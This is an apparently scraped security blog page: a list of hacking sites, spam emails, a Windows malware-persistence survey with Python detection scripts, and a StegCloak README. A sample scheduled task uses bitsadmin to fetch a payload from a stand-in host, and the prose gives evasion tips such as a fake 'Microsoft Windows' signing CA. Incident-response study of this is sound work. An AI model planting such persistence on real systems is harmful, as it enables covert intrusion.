- The Hacker News: The Hacker News — most trusted and widely-acknowledged online cyber security news magazine with in-depth technical coverage for cybersecurity.
- Black Hat: The Black Hat Briefings have become the biggest and the most important security conference series in the world by sticking to our core value: serving the information security community by delivering timely, actionable security information in a friendly, vendor-neutral environment.
- Hack Forums: Emphasis on white hat, with categories for hacking, coding and computer security.
- KitPloit: Leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security.
- HackRead: HackRead is a News Platform that centers on InfoSec, Cyber Crime, Privacy, Surveillance, and Hacking News with full-scale reviews on Social Media Platforms.
- Metasploit: Find security issues, verify vulnerability mitigations & manage security assessments with Metasploit. Get the world's best penetration testing software now.
- Packet Storm: Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers.
- SecurityFocus: Provides security information to all members of the security community, from end users, security hobbyists and network administrators to security consultants, IT Managers, CIOs and CSOs.
- Phrack Magazine: Digital hacking magazine.
- Hakin9: E-magazine offering in-depth looks at both attack and defense techniques and concentrates on difficult technical issues.
- SecTools.Org: List of 75 security tools based on a 2003 vote by hackers.
- Hacked Gadgets: A resource for DIY project documentation as well as general gadget and technology news.
- Offensive Security Training: Developers of Kali Linux and Exploit DB, and the creators of the Metasploit Unleashed and Penetration Testing with Kali Linux course.
- DEFCON: Information about the largest annual hacker convention in the US, including past speeches, video, archives, and updates on the next upcoming show as well as links and other details.
- Exploit DB: An archive of exploits and vulnerable software by Offensive Security. The site collects exploits from submissions and mailing lists and concentrates them in a single database.
- NFOHump: Offers up-to-date .NFO files and reviews on the latest pirate software releases.
- Makezine: Magazine that celebrates your right to tweak, hack, and bend any technology to your own will.
Jun 30, 2020
Top 17 Best Websites To Learn Hacking 2018
Jun 28, 2020
re: Cheap Facebook Traffic
hi
here it is, social website traffic:
http://www.mgdots.co/detail.php?id=113
Full details attached
Regards
Annita Aumick
Unsubscribe option is available on the footer of our website
Jun 16, 2020
re: Rank 1st in google with Content Marketing Strategy
hi
Get your business to the next level with a solid Content Marketing strategy
http://www.str8-creative.io/product/content-marketing/
Regards
Tera Riegel
Unsubscribe option is available on the footer of our website
Jun 11, 2020
Many Ways Of Malware Persistence (That You Were Always Afraid To Ask)
TL;DR: Are you into red teaming? Need persistence? This post is not that long, read it ;)
Are you into blue teaming? Have to find those pesky backdoors? This post is not that long, read it ;)
In the previous post, I listed different ways a Windows domain/forest can be backdoored. In this post I dig a bit deeper and list the most common/known ways malware can survive a reboot using only local resources of the infected Windows system. The list is far from complete, and I would like to encourage everyone to comment on new methods not yet listed here.
From an incident response point of view, one of the best strategies to find malware on a suspicious system is to search for suspicious entries that start with the system. In the good old days you had to check 2-3 locations to cover 99% of the infections. Nowadays there are a thousand ways malware can start. The common ones start automatically whenever Windows starts (or the user logs in), but some tricky ones are triggered by other events.
Autoruns
My favorite tool when it comes to malware persistence is Sysinternals Autoruns. In this section I mainly quote the official built-in help, but bear with me, it is still interesting.
On a side note, there is a problem with Autoruns: it can only run on a live system. (EDIT: This is not true, Autoruns can analyze offline systems as well! Thanks to a comment from Justin.) And that is usually not what I have: I usually have dd images. Although VBoxManage can convert a dd image to the VirtualBox disk image format, I usually don't have the time and storage for that. This is where xmount comes to the rescue: it converts dd and EnCase images on-the-fly, in memory, to the VirtualBox format. Attach the image to a new VirtualBox machine as the main boot HDD, adjust the CPU/disk/controller settings until Windows boots instead of crashing, and voila, you can boot your forensic image without modifying a single bit of the original evidence file. The other problem with malware analysis on a live system is that a good rootkit can easily fool the analyst.
For quick wins, I usually hide the Microsoft entries, look at per-user locations only and check for unverified (missing or invalid Authenticode signature) executables. This finds 90% of malware easily, especially when Autoruns highlights an entry in purple or pink. To find the rest, one has to dig deeper.
[Image: Zeus "hiding" in the usual random directory; note the faked timestamp]
To implement "poor man's monitoring", save the output of Autoruns regularly (autorunsc can write CSV); during incident response a known-good baseline to diff against is highly valuable. Howto guide here.
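As an added example (not tooling from the original post), here is how that quick-win triage and the baseline diff can be done offline on CSV exports written by autorunsc.exe -a * -c -s: it hides Microsoft-verified entries, flags unverified signers and per-user locations, and diffs a current export against a saved baseline. The column layout and the sample rows are assumptions/constructed data, not real Autoruns output; only the Entry Location, Entry, Signer and Image Path columns are used.

```python
"""Offline triage of Autoruns CSV exports (autorunsc.exe -a * -c -s) and a diff
against a saved baseline, i.e. the "poor man's monitoring" described above.
Added example; not the tooling of the original post."""
import csv
import io

# Constructed sample exports, not real Autoruns output. The header mirrors the
# column layout autorunsc writes with -c (assumption); only Entry Location,
# Entry, Signer and Image Path are used below.
BASELINE_CSV = r"""Time,Entry Location,Entry,Enabled,Category,Profile,Description,Signer,Company,Image Path,Version,Launch String
1/1/2020 10:00,HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,SecurityHealth,enabled,Logon,System-wide,Windows Security notification icon,(Verified) Microsoft Windows,Microsoft Corporation,c:\windows\system32\securityhealthsystray.exe,10.0.19041.1,%windir%\system32\SecurityHealthSystray.exe
1/1/2020 10:00,HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,VMware User Process,enabled,Logon,System-wide,VMware Tools Core Service,"(Verified) VMware, Inc.","VMware, Inc.",c:\program files\vmware\vmware tools\vmtoolsd.exe,11.0.5,c:\program files\vmware\vmware tools\vmtoolsd.exe -n vmusr
1/1/2020 10:00,HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,OneDrive,enabled,Logon,DESKTOP-1\alice,Microsoft OneDrive,(Verified) Microsoft Corporation,Microsoft Corporation,c:\users\alice\appdata\local\microsoft\onedrive\onedrive.exe,20.064.0329.0008,c:\users\alice\appdata\local\microsoft\onedrive\onedrive.exe /background
"""

# Same host a month later (constructed): vmtoolsd.exe has been swapped for an
# unsigned copy elsewhere, and a new per-user Run entry points into a random
# AppData folder, the way the Zeus sample in the screenshot above does.
CURRENT_CSV = r"""Time,Entry Location,Entry,Enabled,Category,Profile,Description,Signer,Company,Image Path,Version,Launch String
1/1/2020 10:00,HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,SecurityHealth,enabled,Logon,System-wide,Windows Security notification icon,(Verified) Microsoft Windows,Microsoft Corporation,c:\windows\system32\securityhealthsystray.exe,10.0.19041.1,%windir%\system32\SecurityHealthSystray.exe
2/1/2020 03:12,HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,VMware User Process,enabled,Logon,System-wide,VMware Tools Core Service,"(Not verified) VMware, Inc.","VMware, Inc.",c:\programdata\vmtoolsd.exe,11.0.5,c:\programdata\vmtoolsd.exe -n vmusr
1/1/2020 10:00,HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,OneDrive,enabled,Logon,DESKTOP-1\alice,Microsoft OneDrive,(Verified) Microsoft Corporation,Microsoft Corporation,c:\users\alice\appdata\local\microsoft\onedrive\onedrive.exe,20.064.0329.0008,c:\users\alice\appdata\local\microsoft\onedrive\onedrive.exe /background
2/1/2020 03:14,HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Windows Update Helper,enabled,Logon,DESKTOP-1\alice,,(Not verified) Microsoft Windows,,c:\users\alice\appdata\roaming\ytyyv\qmeuk.exe,1.0.0.0,c:\users\alice\appdata\roaming\ytyyv\qmeuk.exe
"""


def parse_autoruns(text):
    """Return an export as a list of dicts keyed by the CSV header."""
    return list(csv.DictReader(io.StringIO(text)))


def is_verified(row):
    # Autoruns prefixes the signer with "(Verified)" or "(Not verified)".
    return row["Signer"].startswith("(Verified)")


def is_microsoft_verified(row):
    return row["Signer"].startswith("(Verified) Microsoft")


def is_per_user(row):
    """Entry lives in a user hive or its image sits under a user profile."""
    location = row["Entry Location"].upper()
    return location.startswith(("HKCU\\", "HKU\\")) or "\\USERS\\" in row["Image Path"].upper()


def triage(rows, hide_microsoft=True):
    """The quick-win filter: drop Microsoft-verified entries, then report
    everything that is unsigned/unverified or starts from a per-user location."""
    hits = []
    for row in rows:
        if hide_microsoft and is_microsoft_verified(row):
            continue
        reasons = []
        if not is_verified(row):
            reasons.append("unverified signer")
        if is_per_user(row):
            reasons.append("per-user location")
        if reasons:
            hits.append({"location": row["Entry Location"], "entry": row["Entry"],
                         "image": row["Image Path"], "reasons": reasons})
    return hits


def entry_key(row):
    return (row["Entry Location"].lower(), row["Entry"].lower())


def diff_exports(baseline, current):
    """Compare two exports: entries added, removed, and those whose image path
    or signer changed (a swapped binary keeps its autostart name)."""
    before = {entry_key(r): r for r in baseline}
    after = {entry_key(r): r for r in current}
    added = [after[k] for k in after if k not in before]
    removed = [before[k] for k in before if k not in after]
    changed = [(before[k], after[k]) for k in after if k in before
               and (before[k]["Image Path"].lower(), before[k]["Signer"])
               != (after[k]["Image Path"].lower(), after[k]["Signer"])]
    return added, removed, changed


if __name__ == "__main__":
    baseline, current = parse_autoruns(BASELINE_CSV), parse_autoruns(CURRENT_CSV)
    for hit in triage(current):
        print("SUSPICIOUS", hit["location"], hit["entry"], hit["image"], hit["reasons"])
    added, removed, changed = diff_exports(baseline, current)
    print("added:", [r["Entry"] for r in added], "removed:", [r["Entry"] for r in removed],
          "changed:", [(b["Image Path"], a["Image Path"]) for b, a in changed])
```

On a real case, export the baseline with autorunsc.exe -a * -c -s > baseline.csv while the machine is known clean, and run the same command (or Autoruns against the mounted offline image) during the investigation; the diff then points straight at the entries that appeared or changed, and the triage reasons tell you which of them deserve a closer look first.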
Logon
"This entry results in scans of standard autostart locations such as the Startup folder for the current user and all users, the Run Registry keys, and standard application launch locations."
There are 42 registry keys/folders in Autoruns at the moment that can be used to autostart malware. The most common are the HKCU\Software\Microsoft\Windows\CurrentVersion\Run key and the C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup folder.
One of my favorites on this topic is the file-less Poweliks malware, 100% pure awesomeness. Typical ring 3 code execution.
Explorer
"Select this entry to see Explorer shell extensions, browser helper objects, explorer toolbars, active setup executions, and shell execute hooks." 71 registry keys, OMG. Usually these are not about automatic malware execution, but some of them are a good place to hide malware.
Internet explorer
"This entry shows Browser Helper Objects (BHOs), Internet Explorer toolbars and extensions." 13 registry keys here. If a malicious BHO is installed in your browser, you are pretty much screwed.
Scheduled tasks
"Task scheduler tasks configured to start at boot or logon." Not commonly used, but it is important to look at this.
I always thought this part of the autostart entries was quite boring, but nowadays I think it is one of the best ways to hide malware: there are so many entries here by default, and some of them can use quite good tricks to trigger the start.
Did you know that you can create tasks that trigger on Windows event log entries?
Did you know you can create malware persistence using only built-in Windows tools like bitsadmin and Scheduled Tasks?
[Image: Task Scheduler in the old days]
[Image: Task Scheduler in the new days]
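Added example, not part of the original post: a scanner for Task Scheduler XML definitions (the files under %SystemRoot%\System32\Tasks, or what schtasks /query /tn <name> /xml prints) that reports the two tricks just mentioned, event-log triggers and actions that launch bitsadmin or another living-off-the-land binary. The two task definitions are constructed samples, and the list of binaries worth flagging is my assumption.

```python
r"""Scan Task Scheduler definitions for event-log triggers and LOLBin actions.
The definitions are the XML files under %SystemRoot%\System32\Tasks (also what
'schtasks /query /tn <name> /xml' prints). Added example; not the post's tooling."""
import os
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Assumption: binaries that deserve a second look when a task launches them directly.
LOLBINS = {"bitsadmin.exe", "powershell.exe", "cmd.exe", "mshta.exe", "rundll32.exe",
           "regsvr32.exe", "wscript.exe", "cscript.exe", "certutil.exe"}

# Constructed samples, not real tasks. The first fires on System event 7036
# (a service changed state) and uses bitsadmin to fetch a payload; the second
# is a plain logon task for a normally installed program.
EVENT_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <EventTrigger>
      <Enabled>true</Enabled>
      <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="System"&gt;&lt;Select Path="System"&gt;*[System[(EventID=7036)]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
    </EventTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>bitsadmin.exe</Command>
      <Arguments>/transfer upd /download /priority high http://cdn.example.invalid/svc.exe %APPDATA%\svc.exe</Arguments>
    </Exec>
  </Actions>
</Task>"""

LOGON_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>"C:\Program Files\Contoso\Updater.exe"</Command>
      <Arguments>/background</Arguments>
    </Exec>
  </Actions>
</Task>"""


def local_name(tag):
    """Strip the {namespace} prefix ElementTree puts on tag names."""
    return tag.split("}", 1)[-1]


def binary_name(command):
    """'"C:\\Windows\\System32\\cmd.exe"' -> 'cmd.exe'."""
    return os.path.basename(command.strip().strip('"').replace("\\", "/")).lower()


def scan_task_xml(xml_text):
    """Return triggers, event subscriptions, Exec actions and the flags raised."""
    root = ET.fromstring(xml_text)
    triggers, subscriptions = [], []
    trigger_node = root.find("t:Triggers", NS)
    for trig in (list(trigger_node) if trigger_node is not None else []):
        name = local_name(trig.tag)
        triggers.append(name)
        if name == "EventTrigger":
            subscriptions.append(trig.findtext("t:Subscription", "", NS))
    commands = [(ex.findtext("t:Command", "", NS), ex.findtext("t:Arguments", "", NS))
                for ex in root.iterfind("t:Actions/t:Exec", NS)]
    flags = []
    if subscriptions:
        flags.append("event-log trigger")
    for command, args in commands:
        binary = binary_name(command)
        if binary in LOLBINS:
            flags.append(f"suspicious binary: {binary}")
        if "http://" in args.lower() or "https://" in args.lower():
            flags.append("URL in arguments")
    return {"triggers": triggers, "subscriptions": subscriptions,
            "commands": commands, "flags": flags}


def scan_task_dir(task_dir):
    """Walk a Tasks directory (live, or copied from a mounted image) and return
    (path, report) for every task that raised a flag. Files are read as bytes
    so the parser honours their UTF-16 BOM."""
    findings = []
    for dirpath, _, files in os.walk(task_dir):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as f:
                try:
                    report = scan_task_xml(f.read())
                except ET.ParseError:
                    continue
            if report["flags"]:
                findings.append((path, report))
    return findings


if __name__ == "__main__":
    for label, xml in (("event task", EVENT_TASK), ("logon task", LOGON_TASK)):
        print(label, scan_task_xml(xml))
```

Run scan_task_dir against C:\Windows\System32\Tasks on the live box, or against the same path inside the xmount-ed image; a task whose only trigger is an event-log subscription does not show up under "boot or logon" in most people's mental model, which is exactly why it is a good hiding place.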
Services
HKLM\System\CurrentControlSet\Services is a very common place to hide malware, especially rootkits. Check all entries with special care.
Drivers
Same as services: a very common place for rootkits, and the typical startup place for ring 0 rootkits. Unfortunately, signing a driver for 64-bit systems is not fun anymore, as it has to be signed with a certificate that chains back to a Software Publisher Certificate.
Starting with Windows 10, even this changes: all new drivers have to be submitted to the Windows Hardware Developer Center Dashboard portal and signed with an EV certificate.
Codecs
22 registry keys. Not very common, but possible code execution.
Boot execute
"Native images (as opposed to Windows images) that run early during the boot process."
5 registry keys. A good place to hide a rootkit.
Image hijacks
"Image file execution options and command prompt autostarts." 13 registry keys. I believe this was originally intended for debugging purposes.
This is where the good old sticky keys trick hides. It is a bit different from the others, as it provides backdoor access rather than autostart, and you can (usually) only use it from the local network. The trick is to have your code executed whenever someone presses the SHIFT key five times at the logon screen (also over RDP), before logging in. The old way was to replace sethc.exe; the new fun is to set a Debugger value for sethc.exe under Image File Execution Options.
[Image: If you see this, you are in trouble]
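Added example, not from the original post: scanning a reg export of the Image File Execution Options key for Debugger values, which is how the IFEO variant of the sticky-keys trick shows up on disk (and survives an offline image, since reg export can be run against a loaded hive). The sample export is constructed; the list of accessibility binaries reachable from the logon screen beyond sethc.exe is an assumption.

```python
"""Look for IFEO 'Debugger' values in a 'reg export' of Image File Execution
Options, the registry form of the sticky-keys trick. Added example; not the
post's own tooling."""
import re

# Assumption: accessibility binaries the logon screen can launch before anyone
# authenticates (sethc.exe is the one the post names).
LOGON_SCREEN_BINARIES = {"sethc.exe", "utilman.exe", "osk.exe", "magnify.exe",
                         "narrator.exe", "displayswitch.exe", "atbroker.exe"}

# Constructed sample of what
#   reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" ifeo.reg
# writes, after decoding (reg export emits UTF-16LE with a BOM).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DllHost.exe]
"MitigationOptions"=hex:00,00,00,00,00,00,00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\Windows\\System32\\cmd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="\"C:\\Program Files\\WinDbg\\windbg.exe\""
"""

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')
IFEO = "\\image file execution options\\"


def unquote_reg_string(value):
    """Turn a .reg REG_SZ literal ("...", with \\ and \" escapes) back into the
    stored string; returns None for non-string values (hex:, dword: ...)."""
    if not (value.startswith('"') and value.endswith('"')):
        return None
    return re.sub(r'\\(["\\])', r"\1", value[1:-1])


def find_ifeo_debuggers(reg_text):
    """Every subkey of IFEO carrying a Debugger value, with the program that
    will actually run in place of the image."""
    hits, key = [], None
    for line in reg_text.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VALUE_RE.match(line)
        if not (m and key and IFEO in key.lower()):
            continue
        name, raw = m.groups()
        if name.lower() != "debugger":
            continue
        image = key.rsplit("\\", 1)[-1]
        hits.append({"image": image, "debugger": unquote_reg_string(raw),
                     "logon_screen": image.lower() in LOGON_SCREEN_BINARIES})
    return hits


def load_reg_export(path):
    """Read a file written by reg export (UTF-16LE with BOM)."""
    with open(path, "r", encoding="utf-16") as f:
        return f.read()


if __name__ == "__main__":
    for hit in find_ifeo_debuggers(SAMPLE_REG):
        tag = "LOGON-SCREEN BACKDOOR" if hit["logon_screen"] else "debugger"
        print(f"{tag}: {hit['image']} -> {hit['debugger']}")
```

Any Debugger value is worth a look, but one on an accessibility binary is the sticky-keys backdoor itself: the value is the program the loader starts instead of the image, and at the logon screen that program runs as SYSTEM.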
AppInit
"This has Autoruns show DLLs registered as application initialization DLLs." Only 3 registry keys here. This is the good old way to inject a malicious DLL into Explorer, browsers and anything else that loads user32.dll. Luckily it is going away: Windows 8 and later ignore AppInit_DLLs when Secure Boot is enabled.
Known DLLs
"This reports the location of DLLs that Windows loads into applications that reference them." Only 1 registry key. This might be used to hijack some system DLLs.
Winlogon
"Shows DLLs that register for Winlogon notification of logon events." 7 registry keys. Sometimes used by malware.
Winsock providers
"Shows registered Winsock protocols, including Winsock service providers. Malware often installs itself as a Winsock service provider because there are few tools that can remove them. Autoruns can disable them, but cannot delete them." 4 registry keys. AFAIK this was trendy a while ago. But still, a good place to hide malware.
Print monitors
"Displays DLLs that load into the print spooling service. Malware has used this support to autostart itself." 1 registry key. Some malware writers are quite creative when it comes to hiding their persistence module.
LSA providers
"Shows registered Local Security Authority (LSA) authentication, notification and security packages." 5 registry keys. A good place to hide your password stealer.
Network providers
"Missing documentation". If you have a good one-sentence description, please comment. (For the record: network providers are DLLs registered under HKLM\SYSTEM\CurrentControlSet\Services\<provider>\NetworkProvider and ordered by ...\Control\NetworkProvider\Order; the Multiple Provider Router (mpr.dll) loads them, and a provider receives each interactive logon's credentials through its NPLogonNotify callback, which makes it a classic credential-stealer spot.)
WMI filters
This is the category Autoruns uses for permanent WMI event subscriptions: an __EventFilter bound through __FilterToConsumerBinding to a consumer such as CommandLineEventConsumer or ActiveScriptEventConsumer, stored in the WMI repository and evaluated by the WMI service after every boot.
Sidebar gadgets
Common ways - not in autoruns
Now, let's see other possibilities to start your malware, which won't be listed in Sysinternals Autoruns.
Backdoor an executable/DLL
Just change the code of an executable which is either auto-starting or commonly started by the user. To avoid lame mistakes, disable updates for the file ... The Backdoor Factory is a good tool for this task. But if you backdoor an executable/DLL that is already listed in Autoruns, you will break the digital signature of the file. It is recommended to sign your executable, and if you can't afford to steal a trusted certificate, you can still import your own CA into the user's trusted certificate store (with user privileges) and it will look like a trusted one. Protip: use "Microsoft Windows" as the code-signing CA name, and your executable will blend in.
Hijack DLL load order
Just place your DLL into a directory which is searched before the one containing the original DLL, and PROFIT! But again, to avoid lame detection, be sure to proxy the legitimate function calls to the original DLL. A good source on this topic is Mandiant's write-up, as well as the DLL hijack detector tool.
Here you can see how PlugX works in action, by dropping a legitimate Kaspersky executable, and hijacking the DLL calls with their DLL.
Hijack a shortcut from the desktop/start menu
Never underestimate the power of lame tricks. Just create an executable which calls the original executable, and meanwhile starts your backdoor. Replace the link, PROFIT! And don't be a skiddie, check the icon ;) I have seen this trick in adware hijacking browsers a lot of times.
[Image: IE shortcut hijacked to start with http://tinyurl.com/2fcpre6]
File association hijack
Choose the user's favorite file type, replace the program which handles the opening with a similar one described in the previous section, and voila!
COM object hijack
The main idea is that some processes (Explorer, for one) look up COM objects by CLSID that may not even exist on the system, and since HKCU\Software\Classes\CLSID is consulted before the HKLM hive, a per-user entry for such a CLSID gets its DLL loaded automatically, without admin rights. See COMpfun for details.
Windows Application Compatibility - SHIM
Not many people are familiar with Windows Application Compatibility and how it works. Think of it as an added layer between applications and the OS: if an application matches a certain condition (e.g. filename), certain actions take place, such as emulation of directories or registry entries, DLL injection, etc. In my installation there are 367 different compatibility fixes (types of compatibility "simulation"), and some of them can be customized.
[Image: a shim that injects a DLL into IE every time it starts]
Bootkits
Although the bootkits shown here can end up in Autoruns in the drivers section (as they might need a driver at the end of the day), I still think they deserve a separate section.
MBR - Master boot record
Malware can overwrite the Master Boot Record, start the boot process with its own code, and then hand over to the original code. Rootkits commonly fake the content of the MBR and show the original contents when it is read from within the infected OS, so attach the infected HDD to a clean system and compare the first 512 bytes (or more in some cases) with a known clean state, or with what the infected OS shows. Secure Boot can be used to prevent infections like this.
[Image: the MBR viewed from the infected OS differs slightly from the MBR viewed from a clean OS]
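Added example, not the post's own tooling: a byte comparison of the first sector of two images (the clean reference against the suspect image, or the suspect image against the sector as dumped from inside the infected OS) that reports which MBR region changed, with a partition-table decode as a sanity check. Both sectors are constructed inside the script, including the "infection", which patches the bootstrap code the way a simple MBR bootkit would.

```python
"""Compare the first sector (MBR) of a suspect disk image with a known-clean copy,
or with the sector as read from inside the suspect OS. Added example; the sample
sectors are constructed, not taken from a real disk."""
import struct

SECTOR_SIZE = 512
BOOTSTRAP_END = 446         # bytes 0..445: bootstrap code
PARTITION_TABLE_END = 510   # bytes 446..509: four 16-byte partition entries
BOOT_SIGNATURE = b"\x55\xaa"  # bytes 510..511


def parse_mbr(sector):
    """Split a 512-byte sector into its boot signature and non-empty partition entries."""
    if len(sector) < SECTOR_SIZE:
        raise ValueError("need at least 512 bytes")
    partitions = []
    for i in range(4):
        off = BOOTSTRAP_END + 16 * i
        flag, ptype = sector[off], sector[off + 4]
        lba_start, sector_count = struct.unpack_from("<II", sector, off + 8)
        if ptype != 0:
            partitions.append({"index": i, "bootable": flag == 0x80, "type": ptype,
                               "lba_start": lba_start, "sectors": sector_count})
    return {"signature_ok": sector[510:512] == BOOT_SIGNATURE, "partitions": partitions}


def compare_mbr(reference, suspect):
    """Byte-compare two first sectors and name the MBR region(s) that differ."""
    diffs = [i for i in range(SECTOR_SIZE) if reference[i] != suspect[i]]
    regions = set()
    for i in diffs:
        if i < BOOTSTRAP_END:
            regions.add("bootstrap code")
        elif i < PARTITION_TABLE_END:
            regions.add("partition table")
        else:
            regions.add("boot signature")
    return {"differs": bool(diffs), "changed_bytes": len(diffs),
            "first_diff": diffs[0] if diffs else None, "regions": sorted(regions)}


def read_first_sector(path):
    """Sector 0 of a raw dd image, or of a block device such as /dev/sdb when the
    evidence disk is attached read-only to a clean analysis box."""
    with open(path, "rb") as f:
        return f.read(SECTOR_SIZE)


def build_clean_mbr():
    """Constructed clean MBR: a stack-setup stub, one bootable NTFS partition, 0x55AA."""
    # xor ax,ax; mov ss,ax; mov sp,7c00h; mov es,ax; mov ds,ax
    stub = bytes.fromhex("33c08ed0bc007c8ec08ed8")
    bootstrap = stub.ljust(BOOTSTRAP_END, b"\x00")
    # boot flag, CHS start, type 0x07 (NTFS), CHS end, LBA start 2048, 204800 sectors
    entry = bytes([0x80, 0x20, 0x21, 0x00, 0x07, 0xfe, 0xff, 0xff]) + struct.pack("<II", 2048, 204800)
    return bootstrap + entry + bytes(48) + BOOT_SIGNATURE


def build_infected_mbr(clean):
    """Patch the sector the way a simple MBR bootkit would: redirect the first
    instruction into code stashed in the unused tail of the bootstrap area and
    leave the partition table untouched (a real one would jump back afterwards)."""
    infected = bytearray(clean)
    target = 300
    infected[0:3] = b"\xe9" + struct.pack("<H", target - 3)      # jmp rel16 -> offset 300
    infected[target:target + 6] = bytes.fromhex("b40eb021cd10")  # mov ah,0eh; mov al,'!'; int 10h
    return bytes(infected)


if __name__ == "__main__":
    clean = build_clean_mbr()
    print("clean:", parse_mbr(clean))
    print("diff :", compare_mbr(clean, build_infected_mbr(clean)))
```

On a real case the two inputs are read_first_sector("evidence.dd") and a dump taken from inside the running suspect (for example with dd on \\.\PhysicalDrive0); a difference confined to "bootstrap code" with an intact partition table is the classic bootkit pattern, while a difference between the two views of the same disk means the OS is lying about its own MBR.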
VBR - Volume boot record
This is the next logical step where malware can start its code, and some malware/rootkits prefer to hide their startup code here. Check GrayFish for details. Secure Boot can be used to prevent infections like this.
BIOS/UEFI malware
Both the old BIOS and the new UEFI can be modified so that malware starts before the OS has had a chance to run. Although UEFI was meant to be more secure than BIOS, implementation and design errors happen. Check the Computrace anti-theft rootkit for details.
Hypervisor - Ring -1 rootkit
This is somewhat special: I believe a rootkit can run in this layer, but on an average physical machine it cannot persist only in this layer, because it won't survive a reboot (see Rutkowska's presentation from 2006). But because the hypervisor can intercept the restart event, it can write itself into one of the other layers (e.g. install a common kernel driver) and delete that again once it is fully functional after the reboot. Update: There is a good paper from Igor Korkin about hypervisor detection here.
SMM (System Management Mode) malware - Ring -2 rootkit
Somewhat related to the previous type of attack: not many people know that System Management Mode can be used to inject code into the OS. Check the DEITYBOUNCE malware for more details ;) Also, abusing Intel Dual Monitor Mode (DMM), which basically monitors SMM, can lead to untrusted code execution.
Intel® Active Management Technology - Ring -3 rootkit
According to Wikipedia, "Intel Active Management Technology (AMT) is hardware and firmware technology for remote out-of-band management of personal computers, in order to monitor, maintain, update, upgrade, and repair them". You can ask, what could possibly go wrong? See Alexander Tereshkin's and Rafal Wojtczuk's great research on this, or Vassilios Ververis thesis about AMT.
As not many people click on links, let me quote the scary stuff about AMT:
- Independent of the main CPU
- Can access host memory via DMA (with restrictions)
- Dedicated link to NIC, and its filtering capabilities
- Can force host OS to reboot at any time (and boot the system from the emulated CDROM)
- Active even in S3 sleep!
Other stuff
Create new user, update existing user, hidden admins
Esoteric firmware malware
Almost every component in a computer runs firmware, and by replacing that firmware with a malicious one it is possible to start the malware from there, e.g. HDD firmware (see GrayFish again), the graphics card, etc.
Hidden boot device
Malware can hide in one of the boot devices which are checked before the average OS is loaded, and after the malware is loaded, it can load the victim OS.
Network-level backdoor
Think about the following scenario: every time the OS boots, it loads additional data from the network: software updates, configuration updates, etc. Whenever such an update channel is vulnerable (unauthenticated or unverified), the malware injects itself into the response and gets executed. I know, this level of persistence is not foolproof, but it is still possible. Think about the recently discovered GPO MiTM attack, the Evilgrade tool, or even the Xensploit tool when we are talking about VM migration.
Software vulnerability
Almost any kind of software vulnerability can be used as a persistent backdoor. Especially, if the vulnerability can be accessed remotely via the network, without any user interaction. Good old MS08-067...
Hardware malware, built into the chipset
I am not sure what to write here. Ask your local spy agency for further information. Good luck finding those!
More links
Tools I highly recommend:
For more information, check this blog post, part 1, part 2
Update 2017-04-29: A very nice list of Office persistence: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
Update 2017-10-23: Persistence via Security Descriptors and ACLs: https://www.youtube.com/watch?v=SeR4QJbaNRg
Update 2018-07-25: Backdooring LAPS https://rastamouse.me/2018/03/laps---part-1/
https://rastamouse.me/2018/03/laps---part-2/
I would like to thank to Gabor Pek from CrySyS Lab for reviewing and completing this post.
Stegcloak - Hide Secrets With Invisible Characters In Plain Text Securely Using Passwords
StegCloak is a pure JavaScript steganography module written in a functional programming style, which hides secrets inside text by compressing and encrypting them and encoding the result with Zero Width Characters. It can be used to watermark strings, hide invisible scripts on web pages or text on social media, or for any other covert communication. Completely invisible! See how it works in-depth here.
Features
- Protect your invisible secret using passwords and HMAC integrity
- Cryptographically secure by encrypting the invisible secret using AES-256-CTR.
- Uses 7 invisible Unicode characters that work everywhere on the web, including the most important places: Tweets, Gmail, WhatsApp, Telegram, Instagram, Facebook etc.
- Maximum compression to reduce the payload (LZ, Huffman).
- Completely invisible, uses Zero Width Characters instead of white spaces or tabs.
- Super fast! Hides the Wikipedia page-source for steganography (800 lines and 205362 characters) within a covertext of 3 words in under one second.
- Written in pure functional style.
- Usage - Available as an API module, a CLI and also a Web Interface (optimized with web workers).
Installing
Using npm,
$ npm install -g stegcloak
$ npm install stegcloak
How it works
CLI Usage
Hide
$ stegcloak hide
hide [options] [secret] [cover]
-f, --file <file> Extract input from file
-n, --nocrypt If you don't need encryption (default: false)
-i, --integrity If additional security of preventing tampering is needed (default: false)
-o, --output <output> Stream the results to an output file
-h, --help display help for command
Reveal
$ stegcloak reveal
reveal [data]
-f, --file <file> Extract input from file
-cp, --clip Copy Data directly from clipboard
